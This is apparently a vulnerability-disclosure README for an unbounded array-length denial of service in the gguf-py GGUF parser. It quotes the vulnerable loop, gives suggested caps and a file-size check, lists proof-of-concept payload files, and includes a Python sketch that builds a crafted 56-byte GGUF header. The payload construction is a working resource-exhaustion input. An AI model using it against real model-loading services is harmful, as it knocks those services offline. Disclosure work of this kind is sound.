GGUF MFV: Unbounded array-length DoS in `gguf-py` Python parser

huntr Model Format Vulnerability submission. Tier-1 MFV ($4,000).

This repository holds the proof-of-concept GGUF payloads and reproducer script for an unbounded array-length DoS in the canonical Python GGUF parser (gguf-py, shipped as PyPI gguf, maintained at ggml-org/llama.cpp).

Bug class

CWE-400 (Uncontrolled Resource Consumption) / CWE-789 (Memory Allocation with Excessive Size Value).

gguf-py/gguf/gguf_reader.py:239-255 reads a UINT64 alen from the GGUF file header and uses it directly as the loop bound when parsing array-typed metadata fields. There is no upper cap and no check that the declared length is consistent with the file size. The C++ sibling parser in the same repository (ggml/src/gguf.cpp:270) does enforce a cap, GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024 elements (2^30, roughly 10^9). That protection was not propagated to the Python parser.

Payloads in this repo

File	Size	Declared `alen`	Observed parse time (Python 3.13)
`array_len_10000.gguf`	56 bytes	10,000	0.05s
`array_len_100000.gguf`	56 bytes	100,000	0.42s
`array_len_1000000.gguf`	56 bytes	1,000,000	9.15s
`malicious_array_len.gguf`	56 bytes	weaponized value	parser hangs effectively forever
`kv_count_10000.gguf`	47 bytes	10,000 (kv_count branch)	sibling primitive
`kv_count_100000.gguf`	47 bytes	100,000 (kv_count branch)	sibling primitive
`kv_count_1000000.gguf`	47 bytes	1,000,000 (kv_count branch)	sibling primitive

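The largest measurement works out to ~9 us/iter (9.15 s / 10^6 elements); the smaller payloads run closer to 4 to 5 us/iter. Extrapolating linearly at roughly 9 to 10 us/iter: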

`alen`	Parse time
10^7	~91 s
10^8	~15 min
10^9 (matches the C++ sibling cap)	~2.5 hours
10^12	~110 days
2^64 - 1 (UINT64 max)	~5.8 million years
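
The extrapolation above is plain linear arithmetic, and a short sketch makes it easy to recheck. It assumes the per-iteration cost stays at the 9.15 s / 10^6 figure from the measured table. The function name `extrapolate_seconds` is illustrative and not part of the reproducer script. With this exact rate the two largest rows come out slightly lower (about 106 days and about 5.3 million years) than the figures rounded at ~10 us/iter.

```python
# Linear extrapolation of parse time from the largest measured payload.
# Assumption: cost per loop iteration stays constant at 9.15 s / 1e6.
MEASURED_SECONDS = 9.15
MEASURED_ALEN = 1_000_000
SECONDS_PER_ITER = MEASURED_SECONDS / MEASURED_ALEN

SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY


def extrapolate_seconds(alen: int) -> float:
    """Estimated parse time in seconds for a declared array length."""
    return alen * SECONDS_PER_ITER


if __name__ == "__main__":
    for label, alen in [
        ("10^7", 10**7),
        ("10^8", 10**8),
        ("10^9", 10**9),
        ("10^12", 10**12),
        ("2^64 - 1", 2**64 - 1),
    ]:
        secs = extrapolate_seconds(alen)
        print(
            f"{label:>9}: {secs:.3g} s"
            f" = {secs / SECONDS_PER_DAY:.3g} days"
            f" = {secs / SECONDS_PER_YEAR:.3g} years"
        )
```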

Reproducer

pip install gguf
python poc_gguf_py_array_length_dos.py

The script builds minimal 56-byte GGUF files with varying declared alen, then times the parse via gguf.GGUFReader(path). Linear scaling confirms the unbounded loop. Replay with kv_count_*.gguf against the _build_fields / _build_tensor_info loops at line 165 for the sibling primitive.
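
For orientation, here is a minimal sketch of how a 56-byte file with a declared array length can be laid out. It is an assumption about the layout, not a copy of poc_gguf_py_array_length_dos.py: the key name `poc.data` and the UINT8 element type are hypothetical choices that happen to produce 56 bytes, and the payloads in this repo may differ. The sketch only builds bytes and does not invoke the parser.

```python
import struct

# GGUF constants (little-endian layout, format version 3).
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
GGUF_TYPE_UINT8 = 0   # value type id for uint8
GGUF_TYPE_ARRAY = 9   # value type id for array


def build_array_len_payload(declared_len: int, key: bytes = b"poc.data") -> bytes:
    """Build a GGUF header with one array-typed KV and no element data.

    `key` is a hypothetical 8-byte key name chosen for illustration.
    """
    # magic (4) + version u32 (4) + tensor_count u64 (8) + kv_count u64 (8)
    header = GGUF_MAGIC + struct.pack("<IQQ", GGUF_VERSION, 0, 1)
    # key: u64 length prefix followed by the raw key bytes
    kv = struct.pack("<Q", len(key)) + key
    # value type (ARRAY), element type (UINT8), declared element count (u64)
    kv += struct.pack("<IIQ", GGUF_TYPE_ARRAY, GGUF_TYPE_UINT8, declared_len)
    return header + kv


if __name__ == "__main__":
    payload = build_array_len_payload(10_000)
    print(len(payload), "bytes; declared length field:", payload[-8:].hex())
```

The file stays the same size no matter what length is declared, because the length is only a number in the header and no element bytes follow it.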

Sink (verbatim)

llama.cpp/gguf-py/gguf/gguf_reader.py:239-255:

if gtype == GGUFValueType.ARRAY:
    raw_itype = self._get(offs, np.uint32)
    offs += int(raw_itype.nbytes)
    alen = self._get(offs, np.uint64)               # attacker-controlled length
    offs += int(alen.nbytes)
    aparts: list[npt.NDArray[Any]] = [raw_itype, alen]
    data_idxs: list[int] = []
    for idx in range(alen[0]):                       # unbounded iteration
        curr_size, curr_parts, curr_idxs, curr_types = self._get_field_parts(offs, raw_itype[0])
        if idx == 0:
            types += curr_types
        idxs_offs = len(aparts)
        aparts += curr_parts                         # list growth per iter
        data_idxs += (idx + idxs_offs for idx in curr_idxs)
        offs += curr_size
    return offs - orig_offs, aparts, data_idxs, types

Suggested fix

Mirror the C++ cap:

GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024   # 2^30 elements (a count, not bytes)
GGUF_MAX_STRING_LENGTH  = 1024 * 1024 * 1024   # 2^30 bytes (1 GiB)

# Validate before entering the range(alen[0]) loop.
if int(alen[0]) > GGUF_MAX_ARRAY_ELEMENTS:
    raise ValueError(f"GGUF array length {alen[0]} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")

The same protections are needed for the tensor_count and kv_count reads at line 165.
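
A fixed cap still permits very long loops, so a file-size consistency check is a useful complement. The following is a standalone sketch, not a patch against gguf_reader.py: the helper name `check_declared_len` and its parameters are hypothetical, and `min_elem_size` is assumed to be the smallest number of bytes one element can occupy (for example 1 for UINT8, 8 for a string's length prefix).

```python
GGUF_MAX_ARRAY_ELEMENTS = 1024 * 1024 * 1024  # cap taken from the suggested fix


def check_declared_len(alen: int, min_elem_size: int, offs: int, file_size: int) -> int:
    """Reject a declared element count that cannot fit in the rest of the file.

    alen          -- declared element count read from the file
    min_elem_size -- smallest possible encoded size of one element, in bytes
    offs          -- byte offset where the element data would start
    file_size     -- total size of the file in bytes
    """
    alen = int(alen)
    if alen > GGUF_MAX_ARRAY_ELEMENTS:
        raise ValueError(f"array length {alen} exceeds max {GGUF_MAX_ARRAY_ELEMENTS}")
    remaining = file_size - offs
    if remaining < 0 or alen * min_elem_size > remaining:
        raise ValueError(
            f"array length {alen} needs at least {alen * min_elem_size} bytes, "
            f"but only {max(remaining, 0)} remain in the file"
        )
    return alen
```

Under these assumptions, a 56-byte file that declares 10,000 UINT8 elements with no data after the length field is rejected before any loop runs, since zero bytes remain.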

Disclosure status

Submitted to huntr as a Tier-1 Model Format Vulnerability against the GGUF format. This finding belongs to the same primitive class as this researcher's six prior MFV memory-amplification findings on npy / npz / messagepack / pickle / parquet / onnx (May 2026).

The maintainers of ggml-org/llama.cpp are being notified through the huntr disclosure flow.
